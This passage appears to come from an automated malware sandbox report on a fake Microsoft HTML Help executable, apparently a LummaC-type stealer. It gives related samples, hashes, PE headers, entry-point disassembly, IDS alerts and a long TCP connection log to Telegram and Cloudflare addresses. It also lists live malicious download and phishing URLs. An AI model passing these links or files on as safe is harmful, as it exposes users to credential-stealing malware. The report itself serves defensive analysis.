                                          • 149.154.167.99
                                          PROCESO.3.1.305884.20250207.2025020715301400000008.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 149.154.167.220
                                          https://drive.google.com/uc?export=download&id=1FYPPFFRzb0m4iLuTzYE2x-LVa2_xHVD0Get hashmaliciousHTMLPhisherBrowse
                                          • 149.154.167.220
                                          InvoiceReport78410025000003658468.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          Payment Swift-Copy MT103.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          gUpDnriSlQ7TN8m.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          Facturas pagadas.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 149.154.167.220
                                          ExT9esqEsdYqUAY.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          CLOUDFLARENETUShttps://www.canva.com/design/DAGkPkwDgSg/u9VDlBP5gFpCWakWq8SpPQ/view?utm_content=DAGkPkwDgSg&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hc42c7e8522Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                          • 172.67.74.152
                                          libcef.dllGet hashmaliciousLatrodectusBrowse
                                          • 104.21.80.1
                                          NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.134.233
                                          https://drvn.vip/webapp/proposal/67ec4ff641fedGet hashmaliciousCaptcha PhishBrowse
                                          • 104.17.25.14
                                          https://drvn.vip/webapp/proposal/67ec4ff641fedGet hashmaliciousCaptcha PhishBrowse
                                          • 104.22.76.183
                                          NatchoPremium.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.134.233
                                          NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.135.233
                                          NATCHO CHEAT.exeGet hashmaliciousUnknownBrowse
                                          • 162.159.133.233
                                          ShareFile received.pdfGet hashmaliciousUnknownBrowse
                                          • 104.21.6.177
                                          SecuriteInfo.com.Win32.MalwareX-gen.5654.2590.exeGet hashmaliciousLummaC StealerBrowse
                                          • 104.21.12.161
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Win32.MalwareX-gen.5654.2590.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          • 104.21.22.10
                                          SecuriteInfo.com.Trojan.Heur.TP.RuW@bOo3uBfc.2836.5163.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          • 104.21.22.10
                                          SecuriteInfo.com.Win32.MalwareX-gen.30756.7481.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          • 104.21.22.10
                                          SecuriteInfo.com.Win32.MalwareX-gen.12458.14123.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          • 104.21.22.10
                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          • 104.21.22.10
                                          Setup.exeGet hashmaliciousHTMLPhisher, LummaC StealerBrowse
                                          • 149.154.167.99
                                          • 104.21.22.10
                                          Setup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          • 104.21.22.10
                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          • 104.21.22.10
                                          setup.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          • 104.21.22.10
                                          Setup_patched.exeGet hashmaliciousLummaC StealerBrowse
                                          • 149.154.167.99
                                          • 104.21.22.10
                                          No context
                                          No created / dropped files found
                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                          Entropy (8bit):7.61985788210772
                                          TrID:
                                          • Win64 Executable GUI (202006/5) 92.65%
                                          • Win64 Executable (generic) (12005/4) 5.51%
                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                          • DOS Executable Generic (2002/1) 0.92%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:launch3r-v2.2.2.exe
                                          File size:1'577'984 bytes
                                          MD5:2151fa14db38f5b760138ef434cf19db
                                          SHA1:e3d23e54cd659a3c79c70e6adcede8bdf7305745
                                          SHA256:12d1bcd5f34a5bfa63cddf972b8d51213b503b5a940cf3ba10d81104e49e930e
                                          SHA512:2853bba9b0bb2f29b8bb989c8451553bb17008ab58ef4fab09758c276bff8df071784febf550d994c2568316fc22e8cc144248236f2eac4fec71cc71e4c5d577
                                          SSDEEP:24576:kFtBhmrPJpYSHCLuc/NS4W0eLXnGDQ84W0eLXnGDQ:Yfo6NChLXGD1hLXGD
                                          TLSH:4475D12A605692DAF69544F23A45A2A0B463F573873D1FEF80F4E3252507EE40F3E71A
                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...gA.g.........."......|.....................@.....................................g....`........................................
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x14009a188
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x140000000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x67F94167 [Fri Apr 11 16:20:55 2025 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:6
                                          OS Version Minor:0
                                          File Version Major:6
                                          File Version Minor:0
                                          Subsystem Version Major:6
                                          Subsystem Version Minor:0
                                          Import Hash:a898adc0428740dd4fad8431feafaf7a
                                          Instruction
                                          dec eax
                                          sub esp, 28h
                                          call 00007F66E07E75E0h
                                          dec eax
                                          add esp, 28h
                                          jmp 00007F66E07E744Fh
                                          int3
                                          int3
                                          dec eax
                                          mov dword ptr [esp+18h], ebx
                                          push ebp
                                          dec eax
                                          mov ebp, esp
                                          dec eax
                                          sub esp, 30h
                                          dec eax
                                          mov eax, dword ptr [000310D0h]
                                          dec eax
                                          mov ebx, 2DDFA232h
                                          cdq
                                          sub eax, dword ptr [eax]
                                          add byte ptr [eax+3Bh], cl
                                          ret
                                          jne 00007F66E07E7646h
                                          dec eax
                                          and dword ptr [ebp+10h], 00000000h
                                          dec eax
                                          lea ecx, dword ptr [ebp+10h]
                                          call dword ptr [0002C042h]
                                          dec eax
                                          mov eax, dword ptr [ebp+10h]
                                          dec eax
                                          mov dword ptr [ebp-10h], eax
                                          call dword ptr [0002BFACh]
                                          mov eax, eax
                                          dec eax
                                          xor dword ptr [ebp-10h], eax
                                          call dword ptr [0002BF98h]
                                          mov eax, eax
                                          dec eax
                                          lea ecx, dword ptr [ebp+18h]
                                          dec eax
                                          xor dword ptr [ebp-10h], eax
                                          call dword ptr [0002C0B8h]
                                          mov eax, dword ptr [ebp+18h]
                                          dec eax
                                          lea ecx, dword ptr [ebp-10h]
                                          dec eax
                                          shl eax, 20h
                                          dec eax
                                          xor eax, dword ptr [ebp+18h]
                                          dec eax
                                          xor eax, dword ptr [ebp-10h]
                                          dec eax
                                          xor eax, ecx
                                          dec eax
                                          mov ecx, FFFFFFFFh
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc5d500x28.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x18c0000x7cb.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0xd00000x31ec.pdata
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xdd0000xaa0.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0xc16c00x28.rdata
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xbb2000x140.rdata
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0xc60900x318.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000xb7a2e0xb7c0095b7b1836694c92f6874e40f5216f1fbFalse0.514859693877551data7.049880263957565IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0xb90000x101cc0x102009461490fcd9fdc1d1fb916349bae1ce3False0.4074309593023256OpenPGP Secret Key Version 64.8837328659943715IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0xca0000x5ad80x2400eeed9b9b3929e95e2f9accf23ca9bb80False0.1616753472222222data3.921203399253688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .pdata0xd00000x31ec0x32006cbba02ee6fcebeda3c818e974065395False0.50171875data5.792295577943378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .B50xd40000x32290x340075cda5ec0badb9868a9b1af833ca345bFalse0.5454477163461539data6.940675920308152IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .gxfg0xd80000x1c700x1e00e1645edf2fc209056c11ba2648aac183False0.41692708333333334data4.978526138512825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .retplne0xda0000x8c0x2008c950f651287cbc1296bcb4e8cd7e990False0.126953125data1.050583247971927
                                          .tls0xdb0000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          _RDATA0xdc0000x1f40x2004c3192380a3877e08356b066c9690811False0.541015625data4.232091808468937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xdd0000xaa00xc00c0d3f84af9e48e1df863556f22715610False0.4775390625data5.201784219915228IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          .jss0xde0000x566000x56600d3758b95c0f27440babfd26d6525715cFalse1.0003278762662808data7.9995463555560224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .jss0x1350000x566000x56600d3758b95c0f27440babfd26d6525715cFalse1.0003278762662808data7.9995463555560224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x18c0000x7cb0x800f635ea042fd2036c44cd7e7f38cfd43eFalse0.4345703125data4.563754337342242IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0x18c0a00x364dataEnglishUnited States0.4608294930875576
                                          RT_MANIFEST0x18c4040x3c7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.46328852119958636
                                          DLLImport
                                          KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CloseThreadpoolWork, CreateFileA, CreateFileW, CreateThreadpoolWork, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlsAlloc, FlsFree, FlsGetValue, FlsSetValue, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryWhenCallbackReturns, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitOnceBeginInitialize, InitOnceComplete, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlCaptureContext, RtlLookupFunctionEntry, RtlPcToFileHeader, RtlUnwind, RtlUnwindEx, RtlVirtualUnwind, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableSRW, SubmitThreadpoolWork, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                          DescriptionData
                                          CompanyNameMicrosoft Corporation
                                          FileDescriptionMicrosoft HTML Help Executable
                                          FileVersion10.0.19041.1 (WinBuild.160101.0800)
                                          InternalNameHH 1.41
                                          LegalCopyright Microsoft Corporation. All rights reserved.
                                          OriginalFilenameHH.exe
                                          ProductNameHTML Help
                                          ProductVersion10.0.19041.1
                                          Translation0x0409 0x04b0
                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2025-04-12T01:45:03.451714+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549692149.154.167.99443TCP
                                          2025-04-12T01:45:04.302730+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549693104.21.22.10443TCP
                                          2025-04-12T01:45:06.616538+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549694104.21.22.10443TCP
                                          2025-04-12T01:45:07.638100+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549695104.21.22.10443TCP
                                          2025-04-12T01:45:08.625050+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549696104.21.22.10443TCP
                                          2025-04-12T01:45:10.574781+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549697104.21.22.10443TCP
                                          2025-04-12T01:45:11.696467+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549698104.21.22.10443TCP
                                          2025-04-12T01:45:13.695752+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549700104.21.22.10443TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 12, 2025 01:44:51.999083996 CEST49672443192.168.2.5204.79.197.203
                                          Apr 12, 2025 01:44:54.405380964 CEST49672443192.168.2.5204.79.197.203
                                          Apr 12, 2025 01:44:58.259835005 CEST49676443192.168.2.520.189.173.14
                                          Apr 12, 2025 01:44:58.561845064 CEST49676443192.168.2.520.189.173.14
                                          Apr 12, 2025 01:44:59.170857906 CEST49676443192.168.2.520.189.173.14
                                          Apr 12, 2025 01:44:59.217797995 CEST49672443192.168.2.5204.79.197.203
                                          Apr 12, 2025 01:45:00.373989105 CEST49676443192.168.2.520.189.173.14
                                          Apr 12, 2025 01:45:01.056371927 CEST4969180192.168.2.5142.250.9.94
                                          Apr 12, 2025 01:45:01.163872004 CEST8049691142.250.9.94192.168.2.5
                                          Apr 12, 2025 01:45:01.164048910 CEST4969180192.168.2.5142.250.9.94
                                          Apr 12, 2025 01:45:01.164108992 CEST4969180192.168.2.5142.250.9.94
                                          Apr 12, 2025 01:45:01.272099018 CEST8049691142.250.9.94192.168.2.5
                                          Apr 12, 2025 01:45:01.272645950 CEST8049691142.250.9.94192.168.2.5
                                          Apr 12, 2025 01:45:01.272691965 CEST8049691142.250.9.94192.168.2.5
                                          Apr 12, 2025 01:45:01.272767067 CEST4969180192.168.2.5142.250.9.94
                                          Apr 12, 2025 01:45:01.277698994 CEST4969180192.168.2.5142.250.9.94
                                          Apr 12, 2025 01:45:01.387940884 CEST8049691142.250.9.94192.168.2.5
                                          Apr 12, 2025 01:45:01.436552048 CEST4969180192.168.2.5142.250.9.94
                                          Apr 12, 2025 01:45:02.780400038 CEST49676443192.168.2.520.189.173.14
                                          Apr 12, 2025 01:45:03.016113043 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.016164064 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.016366959 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.017442942 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.017486095 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.451644897 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.451714039 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.454901934 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.454914093 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.455317974 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.498977900 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.507873058 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.548275948 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.872505903 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.872567892 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.872589111 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.872626066 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.872631073 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.872654915 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.872663021 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.872678995 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.872695923 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.872709990 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.872786999 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.872834921 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.875258923 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.875281096 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:03.875298023 CEST49692443192.168.2.5149.154.167.99
                                          Apr 12, 2025 01:45:03.875304937 CEST44349692149.154.167.99192.168.2.5
                                          Apr 12, 2025 01:45:04.041865110 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.041930914 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.042007923 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.042351961 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.042371988 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.302395105 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.302730083 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.305658102 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.305674076 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.306068897 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.307780027 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.307873011 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.307890892 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.887835979 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.887885094 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.887919903 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.887958050 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.887996912 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.888067007 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.888087988 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.888088942 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.888103962 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.888120890 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.888178110 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.888178110 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.888205051 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.893083096 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.893127918 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.893158913 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.893189907 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.893584967 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:04.893594980 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:04.936670065 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.005170107 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.005234003 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.005450010 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.005482912 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.005578995 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.005650997 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.005692005 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.005702972 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.005892038 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.006002903 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.006170988 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.006241083 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.006561041 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.006568909 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.006633043 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.006670952 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.006678104 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.006922960 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.006958961 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.006966114 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.007074118 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.007112980 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.007119894 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.007282972 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.007327080 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.007441998 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.007905006 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.007905006 CEST49693443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:05.007924080 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:05.007934093 CEST44349693104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:06.357023001 CEST49694443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:06.357079029 CEST44349694104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:06.357178926 CEST49694443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:06.357507944 CEST49694443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:06.357526064 CEST44349694104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:06.616470098 CEST44349694104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:06.616538048 CEST49694443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:06.622905970 CEST49694443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:06.622917891 CEST44349694104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:06.623245001 CEST44349694104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:06.624845028 CEST49694443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:06.625355005 CEST49694443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:06.625403881 CEST44349694104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:06.625488997 CEST49694443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:06.625495911 CEST44349694104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:07.215351105 CEST44349694104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:07.215635061 CEST44349694104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:07.215790987 CEST49694443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:07.215953112 CEST49694443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:07.215972900 CEST44349694104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:07.411345959 CEST49695443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:07.411398888 CEST44349695104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:07.411474943 CEST49695443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:07.411848068 CEST49695443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:07.411869049 CEST44349695104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:07.592737913 CEST49676443192.168.2.520.189.173.14
                                          Apr 12, 2025 01:45:07.638025999 CEST44349695104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:07.638099909 CEST49695443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:07.639403105 CEST49695443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:07.639413118 CEST44349695104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:07.639736891 CEST44349695104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:07.640958071 CEST49695443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:07.641093016 CEST49695443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:07.641132116 CEST44349695104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:07.641187906 CEST49695443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:07.684305906 CEST44349695104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:08.241137981 CEST44349695104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:08.241451025 CEST44349695104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:08.241503954 CEST49695443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:08.241584063 CEST49695443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:08.394316912 CEST49696443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:08.394361019 CEST44349696104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:08.394831896 CEST49696443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:08.394831896 CEST49696443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:08.394862890 CEST44349696104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:08.624938965 CEST44349696104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:08.625050068 CEST49696443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:08.626667023 CEST49696443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:08.626677990 CEST44349696104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:08.627002954 CEST44349696104.21.22.10192.168.2.5
                                          Apr 12, 2025 01:45:08.632781029 CEST49696443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:08.633023024 CEST49696443192.168.2.5104.21.22.10
                                          Apr 12, 2025 01:45:08.633058071 CEST44349696104.21.22.10192.168.2.5
